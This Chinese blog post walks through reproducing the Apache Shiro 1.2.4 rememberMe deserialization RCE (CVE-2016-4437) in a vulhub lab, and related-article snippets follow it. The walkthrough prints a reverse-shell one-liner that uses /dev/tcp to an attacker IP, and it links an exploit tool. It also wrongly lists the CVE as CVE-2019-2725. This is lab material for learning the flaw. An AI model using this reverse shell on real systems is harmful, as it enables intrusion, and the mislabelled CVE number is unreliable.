Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437)

最新推荐文章于 2025-04-22 10:30:25 发布
最新推荐文章于 2025-04-22 10:30:25 发布
阅读量445 收藏 2
点赞数
分类专栏: CVE漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_41182861/article/details/108696960
版权

漏洞简述

  • Apache shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:
rememberMe的cookie值
Base64解码
AES解密
反序列化

  • 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

  • 漏洞编号:CVE-2019-2725

  • 影响版本:1.2.4及以前版本

  • 测试环境:Linux || vulhub || Apache Shiro

复现开始

  • 工具获取:https://github.com/zhzyker/exphub

  • 首先,启动Apache Shiro服务:
    在这里插入图片描述

利用该漏洞进行反弹shell

1、在攻击机(VPS)上侦听6666端口:
在这里插入图片描述
2、在另外一台攻击机上利用工具发起攻击:
在这里插入图片描述

  • 指定目标主机操作系统,输入反弹指令bash -i >&/dev/tcp/192.168.83.134/6666 0>&1。此时回显Command Send Seccess
    在这里插入图片描述
  • shell已经反弹到攻击机(VPS)上了
    在这里插入图片描述
Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1963
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437) 复现
yukinorong的博客
06-29 3399
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
Apache Shiro 1.2.4反序列化漏洞复现
潜心学安全的小白
11-16 3623
目录漏洞背景漏洞描述影响版本漏洞复现修复建议参考链接 漏洞背景 漏洞描述 shiro默认使用了CookieRememberMeManager, 其处理cookie的流程是: 得到rememberMe的cookie值进行Base64解码,然后AES解密,再反序列化;然而AES的密钥是硬编码的, 就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 影响版本 Apache Shiro <= ...
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437
EC_Carrot的博客
07-27 446
漏洞简介 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 漏洞复现 我们下载工具来完成这次复现:https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.3 不知为何,vulhub的环境会检测失败? ...
Apache Shiro 反序列化漏洞CVE-2016-4437
最新发布
2301_80010733的博客
04-22 302
是一个严重的安全漏洞攻击者可以利用该漏洞通过构造恶意的序列化数据实现远程代码执行(RCE)。
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
漏洞复现(五):Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437
weixin_47306547的博客
01-03 3130
漏洞原理 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 漏洞复现 环境搭建 cd vulhub/shiro/CVE-2016-4437/ docker-compose up -d 漏洞利用 工具:https://github.com/feihong-cs/ShiroExploit/relea.
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 3008
CVE-2016-4437 Shiro反序列化漏洞复现
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437)
qq_51163834的博客
06-05 2278
Apache Shiro框架提供了记住密码的功能,用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>BASE64编码=>RememberMe Cookie值。如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务器收到请求对RememberMe值,先进行base64解码然后AES解密在反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞
Apache Shiro1.2.4反序列化漏洞——CVE-2016-4437
网安小白的博客
08-07 647
apache shiro1.2.4反序列化漏洞复现,包含ubuntu安装docker及vulhub
Apache Shiro RememberMe 1.2.4 反序列化漏洞
ddr12231的博客
08-08 1667
拉取镜像 docker pull medicean/vulapps:s_shiro_1 启动环境 docker run -d -p 80:8080 medicean/vulapps:s_shiro_1 拉取镜像中.....呵呵 ! 网太慢,有时间再弄 转载于:https://www.cnblogs.com/mrhonest/p/11320498.html...
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
weixin_60329395的博客
10-18 4192
1. 内容主要介绍shiro反序列化漏洞的原理和工具的利用。2. 要加深对漏洞的理解还是需要多研究一下自己编写需要的程序。
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437Shiro-550)
不曾扬帆,何以至远方
07-16 607
Shiro 1.2.4 反序列化Shiro 550、CVE-2016-4437
Apache Shiro 反序列化(CVE-2016-4437)复现
m0_48520508的博客
08-03 1737
0x01简介 这个漏洞属于java反序列化漏洞的一种,shiro是java的一个开发框架执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 官网漏洞说明:https://issues.apache.org/jira/browse/SHIRO-550 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRemember
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437)复现
玄道的网安博客
03-05 934
简介 Apache Shiro是一套用于执行认证、授权、加密和会话管理的Java安全框架。 影响版本 Apache Shiro < 1.2.5 环境搭建 这里使用docker来搭建 环境地址 https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2016-4437 进入目录并启动Apache Shiro 1.2.4的Web服务 cd vulhub-master/shiro/CVE-201...
Apache Shiro 1.2.4反序列化漏洞
07-27
- *1* *2* *3* [Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值